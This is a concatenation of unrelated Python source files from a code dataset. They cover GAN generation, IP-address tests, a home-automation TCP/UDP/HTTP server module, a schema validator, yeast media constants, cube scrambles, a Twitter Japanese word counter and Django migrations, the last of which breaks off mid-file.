z = functions.generate_noise(
[opt.nc_z, real_curr[0], real_curr[1]], opt.batchSize)
G_z = G_z[:, :, 0:real_curr[0], 0:real_curr[1]] ## G_z [None, 3, 32, 32]
z_in = noise_amp * z + G_z
G_z = G(z_in.detach(), G_z, mask) ## [1, 3, 26, 26] output of previous generator
G_z = imresize(G_z, real_next[1] / real_curr[1], opt)
G_z = G_z[:, :, 0:real_next[0],
0:real_next[1]] ## resize the image to be compatible with current G [1, 3, 33, 33]
count += 1
elif mode == 'segment':
count = 0
for G, mask, real_curr, real_next, noise_amp in zip(Gs, masks, reals, reals[1:], NoiseAmp):
G_z = G_z[:, :, 0:real_curr[0], 0:real_curr[1]] ## G_z [None, 3, 32, 32]
_, G_z, _ = G(mask, G_z) ## [1, 3, 26, 26] output of previous generator
if opt.contour:
G_z = torch.cat((G_z, 1-G_z), 1)
G_z = imresize(G_z, real_next[1] / real_curr[1], opt)
G_z = G_z[:, :, 0:real_next[0],
0:real_next[1]] ## resize the image to be compatible with current G [1, 3, 33, 33]
count += 1
return G_z
|
StarcoderdataPython
|
3397520
|
import unittest
from netaddr import IPRange, IPAddress
from netaddr_extensions import funcs
from netaddr_extensions import classes
class FuncsTestCase(unittest.TestCase):
def test_bool_funcs(self):
self.assertTrue(funcs.is_netmask('255.255.255.0'))
self.assertFalse(funcs.is_netmask('127.0.0.1'))
self.assertTrue(funcs.is_prefix('24'))
self.assertFalse(funcs.is_prefix('33'))
range1 = IPRange('127.0.0.1', '127.0.0.100')
range2 = IPRange('127.0.0.99', '127.0.0.200')
range3 = IPRange('127.0.2.1', '127.0.2.100')
range4 = IPRange('127.0.2.101', '127.0.2.200')
range5 = IPRange('127.0.0.3', '127.0.0.99')
self.assertTrue(funcs.range_overlap(range1, range2))
self.assertFalse(funcs.range_overlap(range3, range4))
self.assertTrue(funcs.range_in_range(range5, range1))
self.assertFalse(funcs.range_in_range(range2, range1))
def test_conversions(self):
self.assertEqual(funcs.prefix_to_netmask(24), IPAddress('255.255.255.0'))
        self.assertRaises(ValueError, funcs.prefix_to_netmask, 33)
self.assertEqual(funcs.netmask_to_prefix('255.255.255.224'), 27)
self.assertEqual(funcs.netmask_to_hosts(24), 256)
self.assertEqual(funcs.netmask_to_hosts('255.255.255.224'), 32)
def test_validate(self):
self.assertIsNone(funcs.validate_cidr('127.0.0.1/27'))
self.assertRaises(ValueError, funcs.validate_cidr, '255.255.255.0/24')
self.assertRaises(ValueError, funcs.validate_cidr, 'random text')
def test_range(self):
self.assertRaises(ValueError, funcs.get_address_range, '127.0.0.1')
self.assertEqual(funcs.get_address_range(
'127.0.0.0/23'),
['127.0.0.0', '127.0.1.255']
)
self.assertEqual(funcs.get_address_range(
'127.0.0.65/27'),
['127.0.0.65', '127.0.0.96'])
class IrregularClassTest(unittest.TestCase):
def setUp(self):
# Enter the gateway address and prefix / netmask
self.irreg = classes.IrregularRange('172.16.17.32/27')
self.irreg2 = classes.IrregularRange('172.16.31.10/24')
self.irreg3 = classes.IrregularRange('192.168.127.12/27')
def test_properties(self):
irreg = self.irreg
irreg2 = self.irreg2
irreg3 = self.irreg3
self.assertIn('172.16.17.32', irreg)
self.assertEqual('172.16.17.32', irreg.first_addr)
self.assertEqual('192.168.127.12', irreg.last_addr)
self.assertEqual('192.168.3.11', irreg2.last_addr)
self.assertEqual('192.168.3.11', irreg3.last_addr)
self.assertEqual(irreg.network_ip, '172.16.17.32')
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
1798849
|
<reponame>p3g4asus/orvpy
import sys
import traceback
import threading
import logging
from util import init_logger, tohexs, s2b, uunq
from dataparser import RoughParser
import select
import socket
import time
import abc
import event
import json
from device.devicect10 import SendBufferTimer
from action import ActionPing, RV_DATA_WAIT
_LOGGER = init_logger(__name__, level=logging.DEBUG)
if sys.version_info < (3, 0):
import SocketServer
import SimpleHTTPServer
else:
long = int
import socketserver as SocketServer
import http.server as SimpleHTTPServer
class TCPServerHandler(SocketServer.BaseRequestHandler):
"""
The RequestHandler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
# def __init__(self):
# super(ServerHandler,self).__init__()
# self.stopped = True
def stop(self):
self.stopped = True
if self.request is not None:
try:
self.request.close()
self.request = None
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
def handle(self):
self.stopped = False
keyv = '{}:{}'.format(*self.client_address)
threading.currentThread().name = ("TCPServerHandler")
_LOGGER.info(keyv + " connected")
self.request.setblocking(0)
olddata = b''
serv = self.server.s
serv.setclienthandler(self.client_address, self)
wlist = []
remain = b''
disconnectat = 0
parser = RoughParser()
while not serv.stopped and not self.stopped:
try:
ready = select.select([self.request], wlist, [], 0.5)
if disconnectat > 0 and time.time() >= disconnectat:
break
if ready[0]:
data = self.request.recv(4096)
if len(data) > 0:
_LOGGER.info(
"RTCP [" + keyv + "/" + str(len(data)) + "] <-" + tohexs(data))
data = olddata + data
while True:
dictout = parser.parse(
serv.getclientinfo(self.client_address), data)
rv = dictout['idxout']
if 'disconnecttimer' in dictout:
disconnectat = dictout['disconnecttimer']
if 'reply' in dictout:
remain += dictout['reply']
del dictout['reply']
if rv and rv > 0:
tp = dictout['type']
if tp == b"mfz" or tp == b"cry":
serv.setclientinfo(
self.client_address, dictout)
data = data[rv:]
if len(data):
continue
elif rv == RoughParser.DISCARD_BUFFER:
data = b''
break
olddata = data
else:
raise Exception("Readline failed: connection closed?")
if ready[1] or len(wlist) == 0:
if len(remain) == 0:
remain = serv.dowrite(self.client_address)
if len(remain) > 0:
_LOGGER.info("Sending packet to %s:%d" %
self.client_address)
nb = self.request.send(remain)
_LOGGER.info("Sent")
# if tp=="cry":
# _LOGGER.info("STCP ["+keyv+"/"+str(len(remain))+"/"+str(nb)+"] <-"+remain.encode('hex'))
remain = remain[nb:]
wlist = [self.request]
else:
wlist = []
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
break
_LOGGER.info(keyv + " DISCONNECTED")
serv.unsetclientinfo(self.client_address)
_LOGGER.info(keyv + " DELETED")
self.stop()
class EthSender(object):
__metaclass__ = abc.ABCMeta
def __init__(self):
pass
@abc.abstractmethod
def stop(self):
pass
@abc.abstractmethod
def send_packet(self, addr, packet):
"""Retrieve data from the input source and return an object."""
return -1
class TCPClient(EthSender):
def __init__(self, timeo):
super(TCPClient, self).__init__()
self.timeout = timeo
def stop(self):
pass
def send_packet(self, addr, packet):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
try:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(bytearray(packet))
sock.close()
return len(packet)
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
return -1
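# Minimal usage sketch (illustrative only, not part of the original module): send one
# raw packet over TCP with a 5-second timeout; returns the number of bytes written or
# -1 on error. The host and port below are placeholders.
def _example_tcp_send(payload, host='127.0.0.1', port=10000):
    client = TCPClient(5)
    return client.send_packet((host, port), payload)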
class HTTPServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
RESP_UNINIT = -1
RESP_WAIT = 0
RESP_OK = 1
def __init__(self, request, client_address, server):
self.resp_status = HTTPServerHandler.RESP_UNINIT
self.resp_val = {}
event.EventManager.on('ActionParsed', self.schedule_response)
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(
self, request, client_address, server)
def setup(self):
SimpleHTTPServer.SimpleHTTPRequestHandler.setup(self)
self.request.settimeout(60)
def log(self, msg):
_LOGGER.info(
f"[{self.__class__.__name__}] ({self.client_address[0]}:{self.client_address[1]}) -> {msg}")
def schedule_response(self, randid, action, **kwargs):
self.log("action parsed")
if action is not None:
if randid == self.client_address[1]:
self.server.s.schedule_action(randid, self)
self.log("action scheduled")
else:
self.resp_val = {'action': None, 'retval': None}
self.resp_status = HTTPServerHandler.RESP_OK
self.log("schedule_response resp OK")
def write_response_base(self, obj):
self.protocol_version = 'HTTP/1.1'
if 'action' in obj and obj['action'] is not None:
self.send_response(200, 'OK')
else:
self.send_response(403, 'Forbidden')
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(s2b(json.dumps(obj)))
def write_response(self, device, action, retval):
self.resp_val = {'action': action, 'retval': retval}
self.resp_status = HTTPServerHandler.RESP_OK
self.log("write_response resp OK")
def do_GET(self):
start_wait = time.time()
self.log(uunq(self.path[1:]))
self.resp_status = HTTPServerHandler.RESP_WAIT
event.EventManager.fire(eventname='ExtInsertAction',
cmdline=str(self.client_address[1]) + " " +
uunq(self.path[1:]), action=None)
while self.resp_status == HTTPServerHandler.RESP_WAIT and not self.server.s.stopped:
time.sleep(0.2)
if time.time() - start_wait > 30:
self.resp_val = {}
break
self.log("write response NOW")
self.write_response_base(self.resp_val)
# Write the response
# self.path = '/'
# return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
class HTTPServer(threading.Thread):
def __init__(self, tcpport):
super(HTTPServer, self).__init__()
self.port = tcpport
self.server = None
self.stopped = True
self.actions = {}
self.cond = threading.Condition()
self.name = ("HTTPServer")
def stop(self):
if self.server is not None:
self.cond.acquire()
self.stopped = True
self.actions = {}
self.cond.release()
self.server.shutdown()
# self.server.socket.shutdown(SHUT_RDWR)
# self.server.socket.close()
self.server = None
else:
self.stopped = True
def schedule_action(self, randid, client):
if not self.stopped:
self.cond.acquire()
self.actions[str(randid)] = client
self.cond.release()
def run(self):
event.EventManager.on('ActionDone', self.handle_action_done)
self.stopped = False
while not self.stopped:
try:
self.server = SocketServer.ThreadingTCPServer(
("0.0.0.0", self.port), HTTPServerHandler)
break
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
time.sleep(5)
if self.server is not None:
self.server.s = self
self.server.serve_forever()
def handle_action_done(self, device, action, retval, **kwargs):
if not self.stopped:
s = str(action.randomid)
client = None
_LOGGER.info("Searching http client")
self.cond.acquire()
if s in self.actions:
client = self.actions[s]
del self.actions[s]
self.cond.release()
if client is not None:
client.log("Client found")
client.write_response(device, action, retval)
class TCPServer(threading.Thread):
def __init__(self, tcpport):
super(TCPServer, self).__init__()
SocketServer.TCPServer.allow_reuse_address = True
self.port = tcpport
self.server = None
self.stopped = True
self.towrite = {}
self.cond = threading.Condition()
self.clientinfo = {}
self.clienthandler = {}
self.timer = None
self.name = ("TCPServer")
def stop(self):
if self.server is not None:
self.cond.acquire()
self.stopped = True
self.towrite = {}
self.cond.release()
self.clientinfo = {}
self.clienthandler = {}
self.server.shutdown()
# self.server.socket.shutdown(SHUT_RDWR)
# self.server.socket.close()
self.server = None
if self.timer is not None:
self.timer.cancel()
self.timer = None
else:
self.stopped = True
def setclientinfo(self, addr, dictout):
keyv = '{}:{}'.format(*addr)
self.cond.acquire()
self.clientinfo[keyv] = dictout
self.cond.release()
def setclienthandler(self, addr, handler):
keyv = '{}:{}'.format(*addr)
self.cond.acquire()
self.clienthandler[keyv] = handler
self.cond.release()
def getclientinfo(self, addr):
self.cond.acquire()
keyv = '{}:{}'.format(*addr)
if keyv in self.clientinfo:
ci = self.clientinfo[keyv]
else:
ci = {'addr': addr}
self.cond.release()
return ci
def unsetclientinfo(self, addr):
self.cond.acquire()
keyv = '{}:{}'.format(*addr)
# _LOGGER.info("02_unsetting %s" %keyv)
if keyv in self.towrite:
# _LOGGER.info("02_found in towrite")
for x in self.towrite[keyv]:
if isinstance(x, SendBufferTimer):
x.set_finished(None)
# _LOGGER.info("02_setfinish")
del self.towrite[keyv]
if keyv in self.clientinfo:
# _LOGGER.info("02_found in clientinfo")
del self.clientinfo[keyv]
if keyv in self.clienthandler:
# _LOGGER.info("02_found in clienthandler")
self.clienthandler[keyv].stop()
del self.clienthandler[keyv]
self.cond.release()
def handle_action_done(self, device, action, retval, **kwargs):
if isinstance(action, ActionPing) and self.timer is not None:
self.timer_ping_init()
threading.currentThread().name = ("handle_action_done")
strout = json.dumps({'action': action, 'retval': retval}) + '\n'
if device is not None and action is not None:
lst = action.mqtt_publish_onfinish(retval)
lst.extend(device.mqtt_publish_onfinish(action, retval))
device.mqtt_publish_all(lst)
self.schedulewrite(strout)
def timer_ping_init(self):
if self.timer is not None:
self.timer.cancel()
self.timer = threading.Timer(
60, self.handle_action_done, (None, ActionPing(), 1,))
self.timer.name = ("timerping")
self.timer.daemon = True
self.timer.start()
def run(self):
event.EventManager.on('ActionDone', self.handle_action_done)
self.stopped = False
self.timer_ping_init()
while not self.stopped:
try:
self.server = SocketServer.ThreadingTCPServer(
("0.0.0.0", self.port), TCPServerHandler)
break
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
time.sleep(5)
if self.server is not None:
self.server.s = self
self.server.serve_forever()
def dowrite(self, addr):
snd = b''
self.cond.acquire()
keyv = '{}:{}'.format(*addr)
if not self.stopped and keyv in self.clientinfo and keyv in self.towrite:
while len(snd) == 0 and len(self.towrite[keyv]) > 0:
snd = self.towrite[keyv][0]
if isinstance(snd, (bytes, str)):
snd = s2b(self.towrite[keyv].pop(0))
# _LOGGER.info("01_1")
                elif snd.timer is not None:  # we have to wait for the response
snd = b''
# _LOGGER.info("01_2")
break
elif snd.has_succeeded() or snd.has_failed():
if "sender" in self.clientinfo[keyv]:
del self.clientinfo[keyv]['sender']
if snd.has_failed():
self.clientinfo[keyv]['disconnecttimer'] = time.time()
self.towrite[keyv].pop(0)
snd = b''
# _LOGGER.info("01_3")
                else:  # we still have to send the packet, or a timeout occurred and more attempts are needed
snd.clientinfo = self.clientinfo[keyv]
self.clientinfo[keyv]['sender'] = snd
snd = snd.schedule()
# _LOGGER.info("01_4")
self.cond.release()
return snd
def innerschedule(self, keyv, w):
if keyv not in self.towrite:
self.towrite[keyv] = []
if isinstance(w, list):
self.towrite[keyv].extend(w)
else:
self.towrite[keyv].append(w)
def get_connected_clients(self):
lst = dict()
for _, v in self.clientinfo.items():
if 'device' in v:
keyv = '{}:{}'.format(*(v['hp']))
lst[keyv] = v['device']
return lst
def schedulewrite(self, w):
exitv = False
if not self.stopped and self.server is not None:
self.cond.acquire()
if not isinstance(w, SendBufferTimer):
for keyv, v in self.clientinfo.items():
if v['type'] == b'mfz':
self.innerschedule(keyv, w)
exitv = True
else:
keyv = '{}:{}'.format(*(w.addr))
if keyv not in self.clientinfo:
for keyv, v in self.clientinfo.items():
if 'mac' in v and v['mac'] == w.mac:
self.innerschedule(keyv, w)
exitv = True
break
else:
exitv = True
self.innerschedule(keyv, w)
self.cond.release()
return exitv
class EthBuffCont(object):
def __init__(self, ad, d):
self.data = d
self.addr = ad
class ListenerTh(threading.Thread, EthSender):
def send_packet(self, addr, packet):
try:
return self.socket.sendto(bytearray(packet), addr)
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
return -1
def __init__(self, port, *args, **kwargs):
super(ListenerTh, self).__init__(*args, **kwargs)
self.port = port
self.stopped_ev = threading.Event()
self.stopped_ev.set()
self.preparse = RoughParser()
self.socket = None
self.stopped = True
self.name = ("ListenerTh")
def stop(self):
if self.socket:
self.stopped = True
self.socket.sendto(bytearray(b'a'), ('127.0.0.1', self.port))
self.stopped_ev.wait()
self.socket.close()
self.socket = None
def run(self):
""" Listen on socket. """
self.stopped_ev.clear()
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for opt in [socket.SO_BROADCAST, socket.SO_REUSEADDR]:
self.socket.setsockopt(socket.SOL_SOCKET, opt, 1)
self.socket.bind(('', self.port))
self.stopped = False
while not self.stopped:
try:
_LOGGER.info('enterrecv')
data, addr = self.socket.recvfrom(1024)
_LOGGER.info('1) recv %d (%s:%d) ' % (0 if not data else len(
data), 'unkn' if not addr else addr[0], 0 if not addr else addr[1]))
if data is not None and len(data):
self.preparse.parse(
addr, data if data[0:1] != b'@' else data + b'\n')['idxout']
_LOGGER.info('exitrecv')
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
break
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
self.stopped_ev.set()
class UdpManager(object):
def __init__(self, options):
self.port = options.port
self.retry = options.retry
self.timeout = options.timeout
self.broadcast_address = options.broadcast
self.remote = options.remote
self.listener = None
self.sender = None
self.buffer = {}
self.buffer_l = None
def add_to_buffer(self, key, hp, data, **kwargs):
self.buffer_l.acquire()
self.buffer[key] = EthBuffCont(hp, data)
self.buffer_l.notifyAll()
self.buffer_l.release()
def _udp_transact(self, hp, payload, handler, action, keyfind, timeout=-1, **kwargs):
""" Complete a UDP transaction.
UDP is stateless and not guaranteed, so we have to
take some mitigation steps:
- Send payload multiple times.
        - Wait a while to receive the response.
        :param hp: (host, port) tuple of the destination.
        :param payload: Payload to send.
        :param handler: Response handler.
        :param action: Action object passed through to the handler.
        :param keyfind: Callable mapping (hp, payload) to a response-buffer key.
        :param timeout: Timeout in seconds (falls back to the manager default if negative).
"""
u = self
keyv = keyfind(hp, payload)
u.buffer_l.acquire()
host = hp[0]
broadcast = host is None or (len(host) > 4 and host[-4:] == '.255')
if broadcast:
u.buffer.clear()
elif keyv in u.buffer:
del u.buffer[keyv]
u.buffer_l.release()
if timeout is None or timeout < 0:
timeout = u.timeout
if broadcast or u.remote:
host = u.broadcast_address
retval = None
hp2 = (host, u.port if not u.remote or hp[1] <= 0 else hp[1])
for dd in range(u.retry):
if len(payload) > 0 and retval != RV_DATA_WAIT:
try:
self.sender.send_packet(hp2, payload)
_LOGGER.info(f"S [{hp[0]}:{hp[1]}] -> {tohexs(payload)}")
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
return None
if handler is None:
return 5
elif broadcast:
# _LOGGER.info('broadc')
time.sleep(timeout)
break
else:
# _LOGGER.info('no broadc')
u.buffer_l.acquire()
# _LOGGER.info('acquired')
buffcont = u.buffer.get(keyv, None)
if buffcont is None:
now = time.time()
once = False
while time.time() < now + timeout or not once:
# _LOGGER.info("waiting")
u.buffer_l.wait(timeout)
# _LOGGER.info("waiting f")
once = True
buffcont = u.buffer.get(keyv, None)
if buffcont is not None or u.listener is None:
break
u.buffer_l.release()
if u.listener is None:
return None
elif buffcont:
retval = handler(buffcont.addr, action,
buffcont.data, **kwargs)
# _LOGGER.info('Handler returned '+str(retval))
# Return as soon as a response is received
if retval is not None and retval != RV_DATA_WAIT:
break
else:
u.buffer_l.acquire()
del u.buffer[keyv]
u.buffer_l.release()
if retval == RV_DATA_WAIT:
dd -= 1
else:
retval = None
if broadcast:
u.buffer_l.acquire()
retval = handler(None, action, u.buffer, **kwargs)
u.buffer_l.release()
return retval
def configure(self):
if self.buffer_l is None:
self.buffer_l = threading.Condition()
self.listener = ListenerTh(self.port)
self.listener.start()
self.sender = self.listener if not self.remote else TCPClient(
self.timeout)
event.EventManager.on('RawDataReceived', self.add_to_buffer)
def stop(self):
if self.listener is not None:
_LOGGER.info("Stopping Listener Thread")
self.listener.stop()
_LOGGER.info("Listener Thread Stopped")
self.listener = None
if self.sender is not None:
_LOGGER.info("Stopping Sender")
self.sender.stop()
_LOGGER.info("Sender Stopped")
|
StarcoderdataPython
|
1657870
|
import basic_type
from schema_dsl_common import *
def _check_object_type(input_object, path):
if not isinstance(input_object, dict):
raise TypeError(get_message(path, 'Should be an object'))
def _get_unrecognized_message(diff_set):
diff = list(diff_set)
if len(diff) == 1:
return 'Unrecognized field: ' + diff[0]
return 'Unrecognized fields: ' + ', '.join([x for x in diff])
def _check_redundancy(input_object, path, field_name_set):
input_key_set = set(input_object.keys())
if not input_key_set <= field_name_set:
msg = _get_unrecognized_message(input_key_set - field_name_set)
raise ValueError(get_message(path, msg))
def _validate_incoming_object(input_object, path, field_name_set):
if input_object is None:
return None
_check_object_type(input_object, path)
_check_redundancy(input_object, path, field_name_set)
def _process_field(field, parent, input_object):
path = parent + [field['name']]
result = convert(field['field_type'], input_object, path)
return reduce(lambda res, f: f(res, path), field['filters'], result)
def _collect_object_result(input_object, path, fields):
result = {}
for field in fields:
field_name = field['name']
if field_name in input_object:
result[field_name] = _process_field(field, path, input_object[field_name])
else:
result[field_name] = _process_field(field, path, None)
return result
def _convert_object(schema, input_object, path):
path = path or []
field_name_set = set([x['name'] for x in schema['fields']])
_validate_incoming_object(input_object, path, field_name_set)
if input_object is None:
return None
return _collect_object_result(input_object, path, schema['fields'])
def _check_array_type(input_object, path):
if not isinstance(input_object, list):
raise TypeError(get_message(path, 'Should be an array'))
def _validate_array(input_object, path):
if input_object is None:
return
_check_array_type(input_object, path)
def _filter_array_element(input_object, path, element_type, filters):
result = convert(element_type, input_object, path)
return reduce(lambda res, f: f(res, path), filters, result)
def _collect_array_result(input_object, path, element_type, filters):
return [_filter_array_element(input_object[i], path + [str(i)], element_type, filters) for i in
xrange(len(input_object))]
def _convert_array(schema, input_object, path):
path = path or []
_validate_array(input_object, path)
if input_object is None:
return None
return _collect_array_result(input_object, path, schema['element_type'], schema['filters'])
def _convert_either(schema, input_object, path):
for data_type in schema['types']:
try:
return convert(data_type, input_object, path)
except ValueError:
pass
except TypeError:
pass
raise ValueError(get_message(path, 'Invalid value'))
def _schema_wrap(converter):
def f(schema, input_object, path):
return converter(input_object, path)
return f
TYPE_FUNCTION_MAP = {
'String': _schema_wrap(basic_type.string_type),
'Integer': _schema_wrap(basic_type.integer_type),
'Number': _schema_wrap(basic_type.number_type),
'Boolean': _schema_wrap(basic_type.boolean_type),
'StringMap': _schema_wrap(basic_type.string_map),
'Object': _convert_object,
'Array': _convert_array,
'Either': _convert_either
}
def convert(schema, input_object, path=None):
path = path or []
return TYPE_FUNCTION_MAP[schema['type']](schema, input_object, path)
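# A minimal usage sketch (not part of the original module; the schema shape,
# i.e. the 'type', 'fields', 'name', 'field_type' and 'filters' keys, is
# inferred from the converters above, and 'String' is assumed to delegate to
# basic_type.string_type):
#
#     person_schema = {
#         'type': 'Object',
#         'fields': [
#             {'name': 'name', 'field_type': {'type': 'String'}, 'filters': []},
#         ],
#     }
#     convert(person_schema, {'name': 'Alice'})   # -> {'name': 'Alice'}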
|
StarcoderdataPython
|
152303
|
"""
Defines upper bounds of in silico SD media used by Szappanos et al., 2011
"""
from yeast.core.media.constants import reagents
from yeast.core.media.sd.base import sd
szappanos = {
reagents["oxygen"]: 6.3,
reagents["sulphite"]: 100.0,
reagents["phosphate"]: 0.89,
# Carbon
reagents["D-glucose"]: 22.6,
# AA
reagents["L-alanine"]: 0.36,
reagents["L-asparagine"]: 0.36,
reagents["L-aspartate"]: 0.36,
reagents["L-cysteine"]: 0.36,
reagents["L-glutamate"]: 3.6,
reagents["L-glutamine"]: 0.36,
reagents["L-glycine"]: 0.36,
reagents["L-isoleucine"]: 0.36,
reagents["L-leucine"]: 1.8,
reagents["L-methionine"]: 0.36,
reagents["L-phenylalanine"]: 0.36,
reagents["L-proline"]: 0.36,
reagents["L-serine"]: 0.36,
reagents["L-threonine"]: 0.36,
reagents["L-tryptophan"]: 0.36,
reagents["L-tyrosine"]: 0.36,
reagents["L-valine"]: 0.36,
reagents["potassium"]: 4.44,
reagents["sodium"]: 0.75,
reagents["biotin"]: 0.00000142,
reagents["choline"]: 0.00437,
reagents["riboflavin"]: 0.00092,
reagents["thiamine(1+)"]: 0.0032,
reagents["myo-inositol"]: 0.11,
reagents["nicotinate"]: 0.000002,
reagents["4-aminobenzoate"]: 0.000002,
reagents["(R)-pantothenate"]: 0.0002,
# NT
reagents["uracil"]: 3.63,
reagents["adenine"]: 3.01,
}
sdszappanos = {**sd, **szappanos}
|
StarcoderdataPython
|
1740568
|
<reponame>raghav-vish/cubescramble
import random
def scramble3(length=-1, number=1, gen2=False):
ret=[]
for loop in range(number):
scr=''
moves=['R', 'L', 'U', 'D', 'F', 'B']
if(gen2):
moves=['R', 'U']
sides=["", "'", "2"]
prevmov=-1
num=-1
if(length==-1):
lent=random.randint(15, 25)
else:
lent=length
for i in range(lent):
while(num==prevmov):
num=random.randint(0,5)
if(gen2):
num=random.randint(0,1)
side=random.randint(0,2)
prevmov=num
scr+=moves[num]+sides[side]+' '
scr=scr[:-1]
ret.append(scr)
if(len(ret)==1):
return ret[0]
return ret
def scramble2(length=-1, number=1):
ret=[]
for loop in range(number):
scr=''
moves=['R', 'F', 'U']
sides=["", "'", "2"]
prevmov=-1
num=-1
if(length==-1):
lent=random.randint(8, 13)
else:
lent=length
for i in range(lent):
while(num==prevmov):
num=random.randint(0,2)
side=random.randint(0,2)
prevmov=num
scr+=moves[num]+sides[side]+' '
scr=scr[:-1]
ret.append(scr)
if(len(ret)==1):
return ret[0]
return ret
def scramble4(length=-1, number=1):
ret=[]
for loop in range(number):
scr=''
moves=['R', 'L', 'U', 'D', 'F', 'B', 'Rw', 'Lw', 'Uw', 'Dw', 'Fw', 'Bw']
sides=["", "'", "2"]
prevmov=-1
num=-1
if(length==-1):
lent=random.randint(38, 52)
else:
lent=length
for i in range(lent):
while(num==prevmov):
num=random.randint(0,11)
side=random.randint(0,2)
prevmov=num
scr+=moves[num]+sides[side]+' '
scr=scr[:-1]
ret.append(scr)
if(len(ret)==1):
return ret[0]
return ret
def scramble5(length=-1, number=1):
ret=[]
for loop in range(number):
scr=''
moves=['R', 'L', 'U', 'D', 'F', 'B', 'Rw', 'Lw', 'Uw', 'Dw', 'Fw', 'Bw']
sides=["", "'", "2"]
prevmov=-1
num=-1
if(length==-1):
lent=random.randint(38, 52)
else:
lent=length
for i in range(lent):
while(num==prevmov):
num=random.randint(0,11)
side=random.randint(0,2)
prevmov=num
scr+=moves[num]+sides[side]+' '
scr=scr[:-1]
ret.append(scr)
if(len(ret)==1):
return ret[0]
return ret
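# Usage sketch (not in the original file): each scramble function returns a
# single scramble string, or a list of strings when number > 1.
if __name__ == "__main__":
    print(scramble3())             # e.g. "R2 U' F D2 ..."
    print(scramble2(number=2))     # a list holding two scrambles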
|
StarcoderdataPython
|
3326846
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2020 <NAME> <https://github.com/rzhw>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fetch a Twitter list, use it to generate frequency of Japanese vocabulary
"""
from collections import OrderedDict
import json
import sys
import nagisa
import regex
import twitter
from t import ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET, CONSUMER_KEY, CONSUMER_SECRET, LIST_ID
def get_timeline(max_id=None):
if max_id:
return api.GetListTimeline(list_id=LIST_ID, max_id=max_id, count=200)
return api.GetListTimeline(list_id=LIST_ID, count=200)
def get_tweets(api=None, screen_name=None):
timeline = []
earliest_tweet = None
for i in range(20):
tweets = get_timeline(earliest_tweet)
new_earliest = min(tweets, key=lambda x: x.id).id
if not tweets or new_earliest == earliest_tweet:
break
else:
earliest_tweet = new_earliest
print("getting tweets before:", earliest_tweet)
timeline += tweets
return timeline
def validate_japanese(word):
return (not regex.match(r'^\s*$', word) and not regex.match(r'\W', word)
and regex.match(r'\p{Hiragana}|\p{Katakana}|\p{Han}', word))
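# For example (a reading aid, not in the original script): validate_japanese
# keeps tokens such as "日本語" or "たべる" and rejects whitespace, punctuation
# and purely Latin tokens like "hello".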
if __name__ == "__main__":
api = twitter.Api(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN_KEY,
ACCESS_TOKEN_SECRET)
screen_name = sys.argv[1]
print(screen_name)
timeline = get_tweets(api=api, screen_name=screen_name)
all_together = ''
for tweet in timeline:
all_together += tweet.text + "\n"
print("hello")
taggings = nagisa.filter(all_together,
filter_postags=[
'補助記号', '空白', '助詞', '助動詞', '記号', 'URL', '英単語',
'ローマ字文'
])
freq = {}
for word in filter(validate_japanese, taggings.words):
freq[word] = freq.get(word, 0) + 1
# Sort by value
    sorted_freq = OrderedDict(sorted(freq.items(), key=lambda x: x[1],
                                     reverse=True))
output = "Word,Count\n"
for key, value in sorted_freq.items():
output += "%s,%d\n" % (key, value)
with open('output.csv', 'w+') as f:
f.write(output)
|
StarcoderdataPython
|
1690539
|
<filename>django_spanner/client.py
# Copyright 2020 Google LLC
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
from django.db.backends.base.client import BaseDatabaseClient
from google.cloud.spanner_dbapi.exceptions import NotSupportedError
class DatabaseClient(BaseDatabaseClient):
def runshell(self, parameters):
raise NotSupportedError("This method is not supported.")
|
StarcoderdataPython
|
160276
|
<gh_stars>0
# -*- coding: utf-8 -*-
# Generated by Django 1.11.22 on 2019-07-09 23:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('js_locations', '0006_location_featured_image'),
]
operations = [
migrations.AddField(
model_name='location',
name='nofollow',
field=models.BooleanField(default=False, verbose_name='nofollow'),
),
migrations.AddField(
model_name='location',
name='noindex',
field=models.BooleanField(default=False, verbose_name='noindex'),
),
migrations.AddField(
model_name='location',
name='show_on_sitemap',
field=models.BooleanField(default=True, verbose_name='Show on sitemap'),
),
migrations.AddField(
model_name='location',
name='show_on_xml_sitemap',
field=models.BooleanField(default=True, verbose_name='Show on xml sitemap'),
),
]
|
StarcoderdataPython
|
3310234
|
# Generated by Django 3.0.3 on 2020-03-24 18:37
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('study', '0004_remove_student_rating'),
]
operations = [
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
